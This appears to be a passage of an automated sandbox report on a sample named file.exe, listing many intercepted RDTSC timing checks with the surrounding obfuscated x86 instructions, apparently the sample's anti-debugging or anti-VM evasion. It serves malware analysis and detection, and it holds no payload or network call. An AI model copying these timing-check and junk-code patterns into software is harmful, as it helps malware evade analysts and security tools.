                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4BDEB second address: F4BDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4BDF1 second address: F4BE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007FB958B07025h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4BE14 second address: F4BE1E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB958FCD44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4BF09 second address: F4BFA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 add dword ptr [esp], 086A6EA8h 0x0000000c push edi 0x0000000d jmp 00007FB958B07028h 0x00000012 pop edx 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D3980h] 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e call 00007FB958B07020h 0x00000023 jp 00007FB958B07016h 0x00000029 pop esi 0x0000002a sub dword ptr [ebp+122D2A1Fh], edx 0x00000030 popad 0x00000031 push 00000003h 0x00000033 push 8EADDAC3h 0x00000038 jmp 00007FB958B07024h 0x0000003d add dword ptr [esp], 3152253Dh 0x00000044 jo 00007FB958B0701Eh 0x0000004a pushad 0x0000004b mov dx, E553h 0x0000004f mov dl, bh 0x00000051 popad 0x00000052 lea ebx, dword ptr [ebp+1244DD27h] 0x00000058 xor esi, 6612B647h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 jnp 00007FB958B07016h 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C064 second address: F4C07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958FCD44Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C07D second address: F4C0A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FB958B07020h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FB958B0701Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C0A8 second address: F4C0FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+122D3AA8h] 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2A46h], esi 0x00000019 push 00000000h 0x0000001b mov edx, 50D96A28h 0x00000020 push 00000003h 0x00000022 mov dx, di 0x00000025 call 00007FB958FCD449h 0x0000002a jmp 00007FB958FCD44Eh 0x0000002f push eax 0x00000030 pushad 0x00000031 jmp 00007FB958FCD453h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C0FD second address: F4C101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C101 second address: F4C105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C105 second address: F4C11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d jg 00007FB958B07016h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C11C second address: F4C161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB958FCD446h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007FB958FCD451h 0x00000014 jmp 00007FB958FCD456h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jnc 00007FB958FCD458h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C161 second address: F4C165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C165 second address: F4C169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C169 second address: F4C18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 and ecx, dword ptr [ebp+122D3B80h] 0x0000000d lea ebx, dword ptr [ebp+1244DD30h] 0x00000013 sbb esi, 33167D00h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d js 00007FB958B07016h 0x00000023 pop edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34EE3 second address: F34EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34EE9 second address: F34EEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34EEE second address: F34EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B56C second address: F6B572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B572 second address: F6B576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B576 second address: F6B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B6EE second address: F6B6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B9B1 second address: F6B9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B9B5 second address: F6B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD453h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B9CE second address: F6B9D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BF9E second address: F6BFB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB958FCD452h 0x0000000c ja 00007FB958FCD446h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BFB2 second address: F6BFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BFB6 second address: F6BFC2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB958FCD44Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C3CA second address: F6C3DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C589 second address: F6C58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C6C9 second address: F6C6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C6CD second address: F6C6E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD456h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C6E7 second address: F6C6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB958B07016h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C6F5 second address: F6C6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C6F9 second address: F6C702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6CDB3 second address: F6CDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FB958FCD446h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6CDC6 second address: F6CDF0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB958B07016h 0x00000008 jne 00007FB958B07016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB958B07024h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D09D second address: F6D0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D0A1 second address: F6D0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07026h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jc 00007FB958B07039h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D37C second address: F6D384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D384 second address: F6D389 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D389 second address: F6D392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6D392 second address: F6D396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EBDA second address: F6EBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 jmp 00007FB958FCD44Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EBEE second address: F6EBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EBF3 second address: F6EC04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB958FCD446h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D509 second address: F3D516 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D516 second address: F3D53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB958FCD44Fh 0x0000000d popad 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 popad 0x00000013 jc 00007FB958FCD45Ah 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70CF6 second address: F70CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70CFB second address: F70D08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB958FCD448h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D08 second address: F70D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F75203 second address: F75213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F75213 second address: F7522B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7522B second address: F7524E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FB958FCD452h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7524E second address: F75257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F75257 second address: F7525B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79DEA second address: F79E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB958B07016h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB958B07022h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79E0B second address: F79E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79208 second address: F79241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB958B07016h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 je 00007FB958B07016h 0x00000016 jmp 00007FB958B07022h 0x0000001b jmp 00007FB958B07020h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79241 second address: F79275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007FB958FCD448h 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007FB958FCD458h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FB958FCD450h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F793E5 second address: F793EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7957E second address: F79584 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79584 second address: F79594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB958B07016h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79594 second address: F7959C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7959C second address: F795A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F799DE second address: F799F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB958FCD44Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F799F1 second address: F799FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB958B07016h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7BC89 second address: F7BCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB958FCD44Dh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB958FCD456h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C359 second address: F7C374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 sub esi, 1C88D3DAh 0x0000000e mov si, ax 0x00000011 nop 0x00000012 jnc 00007FB958B0701Eh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C57D second address: F7C583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C6CE second address: F7C6D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CE5E second address: F7CE81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958FCD457h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EA77 second address: F7EA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E12A second address: F7E130 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EA7B second address: F7EA81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EA81 second address: F7EB0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D338Dh], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FB958FCD448h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FB958FCD448h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a call 00007FB958FCD451h 0x0000004f mov di, 1347h 0x00000053 pop esi 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FB958FCD456h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F815BB second address: F815C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F82177 second address: F8217B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8217B second address: F82197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F82197 second address: F821B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F821B0 second address: F821B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F423C7 second address: F423CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F423CB second address: F423D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F423D8 second address: F423F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD454h 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87840 second address: F87844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AFDE second address: F8AFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87F0C second address: F87F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88E5D second address: F88E78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C02F second address: F8C088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B0701Bh 0x00000009 popad 0x0000000a nop 0x0000000b jg 00007FB958B0701Fh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB958B07018h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov di, 7A58h 0x00000031 cmc 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2A39h], eax 0x0000003a stc 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88E78 second address: F88E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
